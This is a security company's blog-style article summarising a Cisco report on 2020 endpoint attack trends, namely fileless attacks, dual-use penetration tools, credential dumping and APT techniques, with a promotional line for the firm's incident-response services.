Companies have suffered under a growing barrage of high-profile cyberattacks over the last decade. If it’s not enough that cyber attackers themselves have evolved in sophistication and creativity, the expansion of endpoints hasn’t helped matters. The ever-expanding internet of things and globalization of enterprises mean there are more potential attack vectors than ever. As the result, cybercriminals are eyeing corporate endpoints as easy prey for their proliferating attack vectors.
An understanding of the threat landscape is crucial for dealing with the most prominent threats efficiently.
If you learned that adversaries got hold of the data you are protecting, may it be customer, proprietary, or other sensitive information, you should contact LIFARS immediately.
A new Cisco report, based on MITRE ATTA&CK’s knowledge base, highlights trends in how attacks against corporate endpoints are perpetrated. It suggests a shift in the tactics of cyber attackers.
Fileless attacks have been the most prominent attack vector used against corporate entities in the first half of 2020. In fact, they made up almost a third of all IoCs (indicators of compromise) in attacks on corporate endpoints. These types of attacks have become increasingly popular because they don’t make use of binary files – making tracing and detection much harder. They also usually piggyback off legitimate services which grant them powerful capabilities and high-level privileges.
Powershell and WMI-based, registry tampering, in-memory, and remote login attacks are the most common. Kovter, Poweliks, Divergent, and LemonDuck are some of the most frequently spotted threats.
Dual-use tools (24%) are not far behind fileless attacks and share similarities in terms of the difficulty in identifying an IoC. Dual-use tools are used by professionals for penetration testing and non-malicious training, so are regarded as “legitimate” in certain contexts. However, these same capabilities make them equally useful to attackers, especially as they are freely available.
Metasploit, PowerShell Empire, CobaltStrike, and Powersploit are some of the unwitting culprits highlighted by the Cisco report. However, if these tools don’t form part of your security ecosystem or aren’t currently in use, spotting suspicious incidents becomes easier.
Credential dumping attacks
Also sometimes referred to as credential stuffing attacks, the third most prominent IoC (26%) is another form of dual-use attacks. Using tools like Mimikatz, bad actors can scrape login credentials from compromised endpoints. This can obviously be exploited as a further attack vector by impersonating authorized users with valid credentials.
APT techniques becoming more common
Another huge concern for corporations as well as SMEs is the growing tendency towards APT (advanced persistent threat) attacks. Conventionally, most attacks against businesses were focused on quick in-and-out tactics for short-term financial gain. However, attackers are increasingly using persistent methods of compromise, lying in wait for lucrative opportunities or to cause maximal damage.
This shift is thought to occur from unintentional and intentional leaking of digital espionage tools to cybercriminals from nation-state actors. Countries, such as Russia and North Korea, have long been suspected of this type of state-sanctioned cyber criminality. However, it’s also natural that hackers get access to advanced tools needed for these types of attacks over time.
The attack methods mentioned above can be used as vectors to initiate a prolonged APT attack. Fileless attacks, especially, are well-suited to this type of infiltration because they confound typical detection practices.
Inundated by reports of malware-based attacks, such as Trojans, ransomware, and worms, these often fly under the radar of public awareness. For example, the unforgettable global wave of panic sowed by the wannacry ransomware attack in 2017. However, these three vectors alone compromised 75% of all IoCs in 2020.
This illustrates that guarding corporate endpoints against attacks is an ongoing process that demands evolution and constant refocusing of efforts. Just like cybercriminals, corporate security teams need to continuously adapt to be resistant against the latest trends.